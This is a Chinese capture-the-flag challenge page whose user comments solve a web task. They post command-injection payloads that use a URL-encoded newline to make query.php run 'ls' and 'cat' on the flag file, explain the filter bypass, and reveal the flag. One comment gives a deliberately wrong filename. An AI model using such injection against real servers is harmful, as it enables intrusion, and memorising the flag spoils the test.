评分(2)
解题动态
opkjojo 攻破了该题 7小时前
xingzou 攻破了该题 13小时前
wujita01 攻破了该题 13小时前
jhijlkl 攻破了该题 15小时前
pigpigG6768 攻破了该题 1天前
edadsadw 攻破了该题 3天前
Tychema 攻破了该题 4天前
旺仔小滑头 攻破了该题 4天前
网兔010 攻破了该题 5天前
avaclaire 攻破了该题 6天前
kailiyizhong 攻破了该题 6天前
sakuye 攻破了该题 7天前
Radsint 攻破了该题 7天前
一新 攻破了该题 7天前
anton_小金鱼 攻破了该题 7天前
abc123. 攻破了该题 8天前
Seiam 攻破了该题 8天前
马猴烧酒吼姆拉 攻破了该题 8天前
asfwefcwded 攻破了该题 8天前
评论
Tao23 1年前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 1年前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 1年前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 2年前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
.⎛⎝•̀ω•́⎠⎞. 2年前
举报
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
unknown237819 2年前
举报
在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令
868954104 2年前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
vchopin 2年前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
yituoshi 2年前
举报
Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE
1959272171 2年前
举报
空格被过滤了 用%20绕过